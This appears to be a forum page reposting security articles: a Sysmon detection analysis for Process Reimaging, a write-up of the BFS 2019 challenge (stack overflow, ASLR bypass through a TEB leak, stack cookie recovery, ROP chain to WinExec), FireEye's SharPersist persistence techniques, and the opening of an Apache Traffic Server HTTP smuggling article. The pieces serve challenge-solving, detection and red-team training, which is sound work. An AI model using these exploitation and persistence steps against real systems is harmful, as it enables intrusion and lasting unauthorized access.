Consequently, this allows the wrong process image file information to be returned when queried by applications. This allows an adversary the opportunity to defensively evade detection efforts by analysts and incident responders. Too often organizations are not collecting the “right” data. Often, the data is unstructured, gratuitous, and lacking the substantive details required to arrive at a conclusion. Without quality data, organizations are potentially blind to techniques being run across their environment. Moreover, by relying too heavily on the base configurations of EDR products (i.e. Windows Defender, etc.) you yield the fine-grained details of detection to a third party which may or may not use the correct function calls to detect this malicious activity (such as the case of GetMappedFileName properly detecting this reimaging). Based on these factors, this attack allows the adversary to successfully evade detection. For further context and information on this attack, check out the Technical Deep Dive portion in the original blog post on this topic. Note: GetMappedFileName is an API that is used by applications to query process information. It checks whether the address requested is within a memory-mapped file in the address space of the specified process. If the address is within the memory-mapped file it will return the name of the memory-mapped file. This API requires the PROCESS_QUERY_INFORMATION and PROCESS_VM_READ access rights. Additionally, any time a handle has the access right PROCESS_QUERY_INFORMATION, it is also granted PROCESS_QUERY_LIMITED_INFORMATION. Those access rights have bitmask 0x1010. This may look familiar, as that is one of the desired access rights used by Mimikatz. Matt Graeber brought to my attention that this is the source of many false positives when trying to detect suspicious access to LSASS based on granted access.
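As a quick sanity check of that bitmask, here is the arithmetic in a few lines of Python; the constants are the documented Windows process access right values, and the arithmetic is all this sketch shows:

```python
# Windows process access right constants (documented values).
PROCESS_VM_READ                   = 0x0010
PROCESS_QUERY_INFORMATION         = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# A handle granted PROCESS_QUERY_INFORMATION is implicitly granted
# PROCESS_QUERY_LIMITED_INFORMATION as well, so the GrantedAccess that
# Sysmon reports for a GetMappedFileName-capable handle contains:
granted = PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ
print(hex(granted))  # 0x1010 -- the same mask Mimikatz requests
```

This is exactly why a granted-access filter of 0x1010 on LSASS handle events produces so many false positives.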
Transparency: When this attack was released I spent a Saturday creating a hunt hypothesis, going through the behavioral aspects of the data, and finding its relationships. When reviewing Dwight’s POC I noticed Win32 API calls in the code, and from those I was positive I could correlate those API calls to specific events, because like many defenders I made assumptions regarding EDR products and their logging capabilities. Without a known API to Event ID mapping, I started to map these calls myself. I began (and continue to work on) the Sysmon side of the mapping. This involves reverse engineering the Sysmon driver to map API calls to Event Registration Mechanisms to Event IDs. Huge shoutout to Matt Graeber for helping me in this quest and taking the time to teach me the process of reverse engineering. Creating this mapping was a key part of the Detection Strategy that I implemented and would not have been possible without it. Process Reimaging Detection: Detection Methodology: The methodology that was used for this detection is as follows:
1. Read the technical write-up of the Process Reimaging attack.
2. Read through Dwight’s POC code.
3. Gain knowledge of how the attack executes; create relationships between the data and the behavior of the attack.
4. Execute the attack.
5. Apply the research knowledge with the data relationships to make a robust detection.
Detection Walk Through When walking through the Technical Deep Dive portion of the blog, this stood out to me: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ The picture above shows a couple of API calls that particularly piqued my interest: LoadLibrary and CreateProcess. Based on my research inside of the Sysmon driver, both of these API calls are funneled through an event registration mechanism.
This mechanism is then called upon by the Sysmon driver using the requisite input/output control (IOCTL) codes to query the data. The queried data will then be pulled back into the Sysmon binary, which then produces the correlating Event ID. For both of the API calls above their correlating processes are shown below: Mapping of Sysmon Event ID 1: Process Creation Mapping of Sysmon Event ID 7: Image Loaded Based on this research and the technical deep dive section in the McAfee article, I know exactly what data will be generated when this attack is performed. Sysmon should have an Event ID 7 for each call to LoadLibrary, and an Event ID 1 for the call to CreateProcess; however, how do I turn data into actionable data? Data that a threat hunter can easily use and manipulate to suit their needs? To do this, we focus on Data Standardization and Data Quality. Data Quality is derived from Data Standardization. Data Standardization is the process of transforming data into a common readable format that can then be easily analyzed. Data Quality is the process of making sure the environment is collecting the correct data, which can then be rationalized to specific attack techniques. This can be achieved by understanding the behavior of non-malicious data and creating behavioral correlations of the data provided during this attack. For example, when a process is created, the OriginalFileName (a relatively new addition to Sysmon) should match the Image section within Sysmon Event ID 1. Say you want to launch PowerShell: the OriginalFileName will be PowerShell.EXE and the Image will be C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. When these two things don’t match, it is possibly an indicator of malicious activity. After process reimaging, when an application calls the GetMappedFileName API to retrieve the process image file, Windows will send back the incorrect file path.
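The OriginalFileName/Image comparison can be sketched as a tiny predicate. This is plain Python over dict-shaped events with Sysmon's field names; the sample events are invented for illustration:

```python
# Flag a Sysmon Event ID 1 whose OriginalFileName does not match the file
# name component of its Image path (the two sample events are invented).
import ntpath  # parses Windows-style paths regardless of host OS

def reimaging_indicator(event):
    image_name = ntpath.basename(event["Image"])
    return image_name.lower() != event["OriginalFileName"].lower()

benign = {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "OriginalFileName": "PowerShell.EXE"}
suspicious = {"Image": r"C:\Windows\System32\notavictim.exe",
              "OriginalFileName": "phase1.exe"}
```

A mismatch alone is not proof of reimaging (some legitimate binaries ship with differing OriginalFileName values), which is why the full detection layers additional correlations on top.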
A correlation can be made between the Image field in Event ID 1 and the ImageLoaded field in Event ID 7. Since Event ID 1 and 7 both have the OriginalFileName field, an analyst can execute a JOIN on the data for both events. On this JOIN, the results will show that the path of the process being created and the Image of the process being loaded are equal. With this correlation, one can determine that these two events are from the same activity subset. The correlation above follows this portion of the attack: Function section we are basing Detection from: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ Although a relationship can be made using Sysmon Event ID 1 and Sysmon Event ID 7, another relationship can be made based on the user mode API NtCreateFile. This will go through the event registration mechanism FltRegisterFilter, which creates an Event ID 11 — File Creation in Sysmon. This relationship can be correlated on Sysmon Event ID 1’s Image field, which should match Sysmon Event ID 11’s TargetFilename. Sysmon Event ID 1’s ParentProcessGuid should also match Sysmon Event ID 11’s ProcessGuid to ensure the events are both caused by the same process. Now that the research is done, the hypotheses have to be tested. Data Analytics: Below is the command used to execute the attack. The process (phase1.exe) was created by loading a binary (svchost.exe), then reimaged as lsass.exe. .\CSProcessReimagingPOC.exe C:\Windows\System32\svchost.exe C:\Windows\System32\lsass.exe The following SparkSQL code is the analytics version of what was discussed above: Query run utilizing Jupyter Notebooks and SparkSQL. Gist I tried to make the JOIN functions as readable to the user as possible. One thing to note is that this query is pulling from the raw data logs within Sysmon. No transformations are being performed within a SIEM pipeline.
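The Event ID 1 / Event ID 11 join described above can be sketched in plain Python rather than SparkSQL; the field names follow Sysmon's schema, while the sample events and GUID values are invented:

```python
# Pair an Event ID 1 (process create) with an Event ID 11 (file create)
# when the created file is the new process's image and both events come
# from the same parent process.
def correlate(process_creates, file_creates):
    return [
        (e1, e11)
        for e1 in process_creates
        for e11 in file_creates
        if e1["Image"] == e11["TargetFilename"]
        and e1["ParentProcessGuid"] == e11["ProcessGuid"]
    ]

ev1 = [{"Image": r"C:\Temp\phase1.exe",
        "ParentProcessGuid": "{aaaa-bbbb}"}]
ev11 = [{"TargetFilename": r"C:\Temp\phase1.exe",
         "ProcessGuid": "{aaaa-bbbb}"}]

matches = correlate(ev1, ev11)
```

The real query expresses the same predicate as SQL JOIN conditions over the raw Sysmon logs; the nested-loop version here is only meant to make the join keys explicit.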
Below is a visual representation of the joins and data correlations being done within Jupyter Notebooks utilizing SparkSQL. The query also checks whether a created file is subsequently moved to a different directory, as well as whether the OriginalFileName of a file doesn’t equal the Image for Sysmon Event ID 1 (e.g., a created process with Image “ApplyTrustOffline.exe” and OriginalFileName “ApplyTrustOffline.PROGRAM”). After these checks the query will only bring back the results of the reimaging attack. Graphed View of JOINs in Query The output of the SQL query above can be seen below. You will find that the query output after the attack seems to have “duplicates” of the events. This isn’t the case. Each time the attack is run, there will be a Sysmon Event ID 11 — FileCreate that fires after each Sysmon Event ID 1 — Process Creation. This correlates to the behavior of the attack that was discussed above. Query Output The dataset and Jupyter Notebook that correlate with the following analysis are available on my GitHub. I encourage anyone to pull it down to analyze the data for themselves. If you don’t have a lab to test it in, one can be found here: https://github.com/jsecurity101/mordor/tree/master/environment/shire/aws. Below is a breakdown of the stages and the information of the dataset that was run. This correlates with the query that was run above. One thing to keep in mind is that when the malicious binary is reimaged to the binary of the adversary’s choosing (stage 3), you will not see that “phase1.exe” was reimaged to “lsass.exe”. This is the behavior of the attack; Windows will send back the improper file object. This doesn’t debunk this detection. The goal is to discover the behavior of the attack, and once that is done you can either follow the ProcessGuid of “phase1.exe” or go to its full path to find the Image of the binary it was reimaged with. “Phase1.exe” will appear under the context of that reimaged binary.
Image of the properties of phase1.exe after reimaging is executed Conclusion: Process Reimaging really piqued my interest as it seemed to be focused on flying under the radar to avoid detection. Each technique an attacker leverages will have data that follows the behavior of the attack. This can be leveraged, but only once we understand our data and data sources. Moving away from signature-based hunts to more of a data-driven hunt methodology will help with the robustness of detections. Thank You: Huge thank you to Matt Graeber for helping me with the reverse engineering process of the Sysmon driver. To Dwight Hohnstein, for his POC code. Lastly, to Brian Reitz for helping when SQL wasn’t behaving. References/Resources: In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass Dwight’s Process Reimaging POC Microsoft Docs Posts By SpecterOps Team Members Written by Jonathan Johnson Sursa: https://posts.specterops.io/you-can-run-but-you-cant-hide-detecting-process-reimaging-behavior-e6bb9a10c40b
    1 point
  6. Writeup for the BFS Exploitation Challenge 2019 Table of Contents Introduction TL;DR Initial Dynamic Analysis Statically Identifying the Vulnerability Strategy Preparing the Exploit Building a ROP Chain See Exploit in Action Contact Introduction Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017, I decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64 bit executable for which an exploit is expected to work on a Windows 10 Redstone machine. The challenge's goals were set to: Bypass ASLR remotely Achieve arbitrary code execution (pop calc or notepad) Have the exploited process properly continue its execution TL;DR Spare me all the boring details, I want to grab a copy of the challenge study the decompiled code study the exploit Initial Dynamic Analysis Running the file named 'eko2019.exe' opens a console application that seemingly waits for and accepts incoming connections from (remote) network clients. Quickly checking out the running process' security features using Sysinternals Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good. Further checking out the running process dynamically using tools such as Sysinternals TCPView, Process Monitor or simply running netstat could have been an option right now, but personally I prefer diving directly into the code using my static analysis tool of choice, IDA Pro (I recommend following along with your favourite disassembler / decompiler). Statically Identifying the Vulnerability Having disassembled the executable file and looking at the list of identified functions, the number of functions that needed to be analyzed for weaknesses was as few as 17 out of 188 in total - with the remaining ones being known library functions, imported functions and the main() function itself.
Navigating to and running the disassembled code's main() function through the Hex-Rays decompiler and putting some additional effort into renaming functions, variables and annotating the code resulted in the following output: By looking at the code and annotations shown in the screenshot above, we can see there is a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably where the party is going to happen, so let's have a look at it. As an attacker, what we are going to look for and concentrate on are functions within the server's executable code that process any kind of input that is controlled client-side. All with the goal in mind of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for receiving data from a remote network client. The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure. It consists of three distinct fields, of which the first one at offset 0 is "magic", a second at offset 8 is "size_payload" and the third is unused. By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server ensures basic protocol compatibility between connected clients and the server. Any client packet that fails in complying with this magic constant as part of the "header" packet is denied further processing as a consequence. By comparing the "size_payload" field of the "header" structure to a constant value in line 27, the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to recv() in line 30 receives a maximum number of 512 bytes in total. 
Doing so prevents the destination buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad! If this sanity check wasn't present, it would have allowed us to overwrite anything that follows the "buf" buffer, including the return address to main() on the stack. Overwriting the saved return address could have resulted in straightforward and reliable code execution. Skimming through this function's remaining code (and also through all the other remaining functions) doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either. So we must probably have overlooked something and -yes you guessed it- it's in the processing of the "pkthdr" structure. A useful pointer to what the problem could be is provided by the hint window that appears as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a signed integer comparison, which means the size restriction of 512 can successfully be bypassed by providing a negative number along with the header packet in "size_payload"! Looking further down the code at line 30, the "size_payload" variable is typecast to a 16 bit integer type as indicated by the decompiler's LOWORD() macro. Typecasting the 32 bit "size_payload" variable to a 16 bit integer effectively cuts off its upper 16 bits before it is passed as a size argument to recv(). This enables an attacker to cause the server to accept payload data with a size of up to 65535 bytes in total. Sending the server a respectively crafted packet effectively bypasses the intended size restriction of 512 bytes and successfully overwrites the "buf" variable on the stack beyond its intended limits. 
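The signed-comparison bypass plus the LOWORD() truncation can be sketched in a few lines of Python. The 16-byte header layout (8-byte magic, 32-bit size_payload, 4 unused bytes) is taken from the decompilation described above; the exact null-padding of the magic is an assumption:

```python
# Craft a header whose size_payload passes the signed "<= 512" check yet
# makes recv() read 0x210 (528) bytes -- enough to overflow buf[512].
import struct

MAGIC = b"Eko2019\x00"            # 8-byte magic, null-padded (assumed layout)
want = 0x0210                     # bytes we want recv() to accept (> 512)
size_payload = want - 0x10000     # 0xFFFF0210 as uint32 -> negative as int32

header = struct.pack("<8si4x", MAGIC, size_payload)

assert struct.unpack("<i", header[8:12])[0] <= 512   # signed check passes
assert struct.unpack("<H", header[8:10])[0] == want  # LOWORD() seen by recv()
```

Any payload length up to 0xFFFF can be smuggled this way by putting the real size in the lower 16 bits and any negative pattern in the upper 16.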
If we wanted to verify the decompiler's results, or if we refrained from using a decompiler entirely because we preferred sharpening or refreshing our assembly comprehension skills instead, we could just as well have a look at the assembler code: the "jle" instruction indicates a signed integer comparison, and the "movzx eax, word ptr..." instruction moves 16 bits of data from its source operand into the 32 bit register eax, zero-extending its upper 16 bits. Alright, before we can start exploiting this vulnerability and take control of the server process' instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the handle_client() function's prologue in the disassembly, we can see there is a stack cookie that will be checked by the function's epilogue, which eventually needs to be taken care of. Strategy In order to bypass ASLR, we need to cause the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function in line 45, which sends 8 bytes of data, so exactly the size of a pointer in 64 bit land. That should serve our purpose just fine. These 8 bytes of data are stored into a _QWORD variable "gadget_buf" as the result of a call to the exec_gadget() function in line 44. Going further up the code to line 43, we can see self-modifying code that uses the WriteProcessMemory() API function to patch the exec_gadget() function with whatever data "gadget_buf" contains. The "gadget_buf" variable in turn is the result of a call to the copy_gadget() function in line 41 which is passed the address of a global variable "g_gadget_array" as an argument. Looking at the copy_gadget() function's decompiled code reveals that it takes an integer argument, swaps its endianness and then returns the result to the caller. In summary, whatever 8 bytes the "g_gadget_array" at position "gadget_idx % 256" points to will be executed by the call to exec_gadget() and its result is then sent back to the connected client.
Looking at the cross references to "g_gadget_array", which is only initialized during run-time, we can find a for loop that initializes 256 elements of the array "g_gadget_array" as part of the server's main() function: Going back to the handle_client() function, we find that the "gadget_idx" variable is initialized with 62, which means that the gadget pointed to by "p_gadget_array[62]" is executed by default. The strategy is getting control of the "gadget_idx" variable. Luckily, it is a stack variable adjacent to the "buf[512]" variable and thus can be written to by sending the server data that exceeds the "buf" variable's maximum size of 512 bytes. Having "gadget_idx" under control allows us to have the server execute a gadget other than the default one at index 62 (0x3e). In order to be able to find a reasonable gadget in the first place, I wrote a little Python script that mimics the server's initialization of "g_gadget_array" and then disassembles all its 256 elements using the Capstone Engine Python bindings: I spent quite some time reading the resulting list of gadgets trying to find a suitable gadget to be used for leaking a qualified pointer from the running process, but with partial success only. Knowing I must have been missing something, I still settled on a gadget that would leak only the lower 32 bits of a 64 bit pointer, for the sake of progressing, planning to fix it properly later: Using this gadget would modify the pointer that is passed to the call to exec_gadget(), making it point to a location other than what the "p" pointer usually points to, which could then be used to leak further data. Based on working around some limitations by hard-coding stuff, I still managed to develop quite a stable exploit including full process continuation. But it was only after a kind soul asked me whether I hadn't thought of reading from the TEB that I got on the right track to writing an exploit that is more than just quite stable.
Thank you Preparing the Exploit The TEB holds vital information that can be used for bypassing ASLR, and it is accessed via the gs segment register on 64 bit Windows systems. Looking through the list of gadgets for any occurrence of "gs:" yields a single hit at index 0x65 of the "g_gadget_array" pointer. Acquiring the current thread's TEB address is possible by reading from gs:[030h]. In order to have the gadget that is shown in the screenshot above do so, the rcx register must first be set to 0x30. The rcx register is the first argument to the exec_gadget() function, which is loaded from the "p" variable on the stack. Like the "gadget_idx" variable, "p" is adjacent to the overflowable buffer, hence overwritable as well. Great. By sending a particularly crafted sequence of network packets, we are now given the ability to leak arbitrary data of the server thread's TEB structure. For example, by sending the following packet to the server, gadget number 0x65 will be called with rcx set to 0x30. [0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00'] Sending this packet will overwrite the target thread's following variables on the stack and will cause the server to send us the current thread's TEB address: [buf] + [gadget_idx] + [p] The following screenshot shows the Python implementation of the leak_teb() function used by the exploit. With the process' TEB address leaked to us, we are well prepared for leaking further information by using the default gadget 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed to by rcx per request: In turn, leaking arbitrary memory allows us to bypass DEP and ASLR, identify the stack cookie's position on the stack, leak the stack cookie, locate ourselves on the stack, and eventually run an external process. In order to bypass ASLR, the "ImageBaseAddress" of the target executable must be acquired from the Process Environment Block which is accessible at gs:[060h].
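The leak packet shown above can be put together with struct. The filler size 0x200, gadget index 0x65 and rcx value 0x30 come straight from the write-up; the exact header packing is an assumption carried over from the decompiled header layout:

```python
# Build the TEB-leak packet: overflow buf[512], then overwrite the two
# adjacent stack variables gadget_idx and p (p ends up in rcx).
import struct

def leak_packet(gadget_idx, rcx):
    payload = b"A" * 0x200                    # fills buf up to gadget_idx
    payload += struct.pack("<Q", gadget_idx)  # gadget to execute
    payload += struct.pack("<Q", rcx)         # pointer argument / rcx value
    size = 0xFFFF0000 | len(payload)          # negative int32, LOWORD = real size
    return struct.pack("<8sI4x", b"Eko2019\x00", size) + payload

# Gadget 0x65 reads gs:[rcx]; rcx = 0x30 yields the current thread's TEB.
teb_leak = leak_packet(0x65, 0x30)
```

The same helper drives the later leaks: once the TEB address is known, default gadget 0x3e with rcx set to any address reads arbitrary process memory, 8 bytes per request.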
This will allow for relative addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses Data Execution Prevention. Based on the executable's in-memory "ImageBaseAddress", the address of the WinExec() API function, as well as the stack cookie's xor key, can be leaked. What's still missing is a way of acquiring the stack cookie from the current thread's stack frame. Although I knew that the approach was faulty, I had initially leaked the cookie by abusing the fact that there exists a reliable pointer to the formatted text that is created by any preceding call to the printf() function. By sending the server a packet that solely consisted of printable characters, with a size that would overflow the entire stack frame but stop right before the stack cookie's position, the call to printf() would leak the stack cookie from the stack into the buffer holding the formatted text, whose address had previously been acquired. While this might have been an interesting approach, it is error-prone: if the cookie contained any null-bytes right in the middle, the call to printf() would make only a partial copy of the cookie, which would have caused the exploit to become unreliable. Instead, I've decided to leak both "StackBase" and "StackLimit" from the TIB, which is part of the TEB, and walk the entire stack, starting from StackLimit, looking for the first occurrence of the saved return address to main(). Relative to that address, the cookie that belongs to the handle_client() function's stack frame can be addressed and subsequently leaked to our client. Having a copy of the cookie and a copy of the xor key at hand allows the rsp register to be recovered, which can then be used to build the final ROP chain.
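The recovery step is a single XOR: on x64, MSVC's /GS protection stores the module's __security_cookie XORed with rsp in the frame, so leaking both the stored cookie and the xor key gives back the stack pointer. The two leaked values below are made up for illustration:

```python
# Recover rsp from a leaked /GS stack cookie and the module's xor key.
xor_key       = 0x00002B992DDFA232  # hypothetical leaked __security_cookie
rsp_at_entry  = 0x000000D98FF7F620  # value we want to recover
stored_cookie = xor_key ^ rsp_at_entry  # what the stack walk would find

recovered_rsp = stored_cookie ^ xor_key
assert recovered_rsp == rsp_at_entry
```

With rsp known, the absolute stack addresses of "buf", "ptr_to_chain" and the saved return address all follow, which is what the ROP chain below relies on.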
Using ROPgadget, a list of gadgets was created which was then used to craft the following chain:
1. The ROP chain starts at "entry_point", which is located at offset 0x230 of the vulnerable function's "buf" variable and which previously contained the original return address to main(). It loads "ptr_to_chain" at offset 0x228 into the rsp register, which effectively lets rsp point into the next gadget at 2.). Stack pivoting is a vital step in order to avoid trashing the caller's stack frame; messing up the caller's frame would jeopardize stable process continuation.
2. This gadget loads the address of a "pop rax" gadget into r12 in preparation for a "workaround" that is required in order to compensate for the return address that is pushed onto the stack by the call r12 instruction in 4.).
3. A pointer to "buf" is loaded into rax, which now points to the "calc\0" string.
4. The pointer to "calc\0" is copied to rcx, which is the first argument for the subsequent API call to WinExec() in 5.). The call to r12 pushes a return address on the stack and causes a "pop rax" gadget to be executed, which will pop the address off of the stack again.
5. This gadget causes the WinExec() API function to be called.
6. The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence the stack pointer is adjusted by this gadget to skip the data that is "corrupted" by the call to WinExec().
7. The original return address to main()+0x14a is loaded into rax.
8. rbx is loaded with the address of "entry_point".
9. The original return address to main()+0x14a is restored by patching "entry_point" on the stack -> "mov qword ptr [entry_point], main+0x14a". After that, rsp is adjusted, followed by a few dummy bytes.
10. rsp is adjusted so it will slowly slide into its old position at offset 0x230 of "buf", in order to return to main() and guarantee process continuation.
11. see 10.)
12. see 10.)
13. see 10.)
See Exploit in Action Contact Twitter Sursa: https://github.com/patois/BFS2019
    1 point
  7. Threat Research SharPersist: Windows Persistence Toolkit in C# September 03, 2019 | by Brett Hawkins powershell persistence Toolkit Windows Background PowerShell has been used by the offensive community for several years now, but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, the Antimalware Scan Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant’s Red Team called SharPersist. Windows Persistence During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1. Figure 1: FireEye Attack Lifecycle Diagram Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service.
There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, registry, and startup folder, and there continues to be more discovered. For a more thorough list, see the MITRE ATT&CK persistence page. Figure 2: Persistence equation SharPersist Overview SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike’s “execute-assembly” functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built-in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden. SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page. SharPersist Persistence Techniques There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3.
Technique | Description | Technique Switch Name (-t) | Admin Privileges Required? | Touches Registry? | Adds/Modifies Files on Disk?
KeePass | Backdoor KeePass configuration file | keepass | No | No | Yes
New Scheduled Task | Creates new scheduled task | schtask | No | No | Yes
New Windows Service | Creates new Windows service | service | Yes | Yes | No
Registry | Registry key/value creation/modification | reg | No | Yes | No
Scheduled Task Backdoor | Backdoors existing scheduled task with additional action | schtaskbackdoor | Yes | No | Yes
Startup Folder | Creates LNK file in user startup folder | startupfolder | No | No | Yes
Tortoise SVN | Creates Tortoise SVN hook script | tortoisesvn | No | Yes | No
Figure 3: Table of supported persistence techniques
SharPersist Examples On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below. Registry Persistence The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4.
Registry Key Code (-k) | Registry Key | Registry Value | Admin Privileges Required? | Supports Env Optional Add-On (-o env)?
hklmrun | HKLM\Software\Microsoft\Windows\CurrentVersion\Run | User supplied | Yes | Yes
hklmrunonce | HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | User supplied | Yes | Yes
hklmrunonceex | HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | User supplied | Yes | Yes
userinit | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | Userinit | Yes | No
hkcurun | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | User supplied | No | Yes
hkcurunonce | HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | User supplied | No | Yes
logonscript | HKCU\Environment | UserInitMprLogonScript | No | No
stickynotes | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | RESTART_STICKY_NOTES | No | No
Figure 4: Supported registry keys table
In the following example, we will be performing a validation of our arguments and then will add registry persistence.
Performing a validation before adding the persistence is a best practice, as it makes sure that you have the correct arguments and passes other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named “Test” with the value “cmd.exe /c calc.exe” in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key. Figure 5: Adding registry persistence Once the persistence needs to be removed, it can be removed using the “-m remove” argument, as shown in Figure 6. We are removing the “Test” registry value that was created previously, and then we are listing all registry values in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” to validate that it was removed. Figure 6: Removing registry persistence Startup Folder Persistence The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called “Test.lnk” that will be placed in the current user’s startup folder and will execute “cmd.exe /c calc.exe”, shown in Figure 7. Figure 7: Performing dry-run and adding startup folder persistence The startup folder persistence can then be removed, again using the “-m remove” argument, as shown in Figure 8. This will remove the LNK file from the current user’s startup folder. Figure 8: Removing startup folder persistence Scheduled Task Backdoor Persistence The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9.
Figure 9: Listing scheduled tasks that run at logon Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work and then actually execute the command as shown in Figure 10. Figure 10: Performing dry run and adding scheduled task backdoor persistence As you can see in Figure 11, the scheduled task is now backdoored with our malicious action. Figure 11: Listing backdoored scheduled task A backdoored scheduled task action used for persistence can be removed as shown in Figure 12. Figure 12: Removing backdoored scheduled task action Conclusion Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community and persistence is no exception. Windows provides multiple techniques for persistence and there will continue to be more discovered and used by security professionals and adversaries alike. This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell. Sursa: https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html
    1 point
  8. Security: HTTP Smuggling, Apache Traffic Server

Sept 17, 2019 (english, security). Details of CVE-2018-8004 (August 2018 - Apache Traffic Server).

What is this about ?
Apache Traffic Server ?
Fixed versions of ATS
CVE-2018-8004
Step by step Proof of Concept
    Set-up the lab: Docker instances
    Test That Everything Works
    Request Splitting by Double Content-Length
    Request Splitting by NULL Character Injection
    Request Splitting using Huge Header, Early End-Of-Query
    Cache Poisoning using Incomplete Queries and Bad Separator Prefix
        Attack schema
    HTTP Response Splitting: Content-Length Ignored on Cache Hit
        Attack schema
Timeline
See also

English version (Version Française disponible sur makina corpus). Estimated read time: 15 min to really more.

What is this about ?

This article will give a deep explanation of the HTTP Smuggling issues present in CVE-2018-8004. Firstly because there's currently not much information about it ("Undergoing Analysis" at the time of this writing on the previous link). Secondly because some time has passed since the official announcement (and even more since the availability of fixes in v7), and mostly because I keep receiving questions on what exactly HTTP Smuggling is and how to test/exploit this type of issue, and because Smuggling issues are now trending and easier to test thanks to the great work of James Kettle (@albinowax).

So, this time, I'll give you not only details but also a step-by-step demo with some DockerFiles to build your own test lab. You can use that test lab to experiment with manual raw queries, or to test the recently added BURP Suite Smuggling tools. I'm really a big partisan of always searching for Smuggling issues in non-production environments, for legal reasons and also to avoid unintended consequences (and we'll see in this article, with the last issue, that unintended behaviors can always happen).

Apache Traffic Server ?

Apache Traffic Server, or ATS, is an Open Source HTTP load balancer and Reverse Proxy Cache.
It is based on a commercial product donated to the Apache Foundation. It's not related to the Apache httpd HTTP server; the "Apache" name comes from the Apache Foundation, and the code is very different from httpd. If you were to search for ATS installations in the wild you would find some, hopefully fixed by now.

Fixed versions of ATS

As stated in the CVE announcement (2018-08-28), impacted ATS versions are versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released on 2018-08-02 and 6.2.3 on 2018-08-04. That's the official announcement, but I think 7.1.3 contained most of the fixes already, and is maybe not vulnerable. The announcement was mostly delayed for the 6.x backports (and some other fixes were released at the same time, on other issues). If you wonder about previous versions, like 5.x, they're out of support, and quite certainly vulnerable. Do not use out-of-support versions.

CVE-2018-8004

The official CVE description is:

There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS.

Which does not give a lot of pointers, but there's much more information in the 4 pull requests listed:

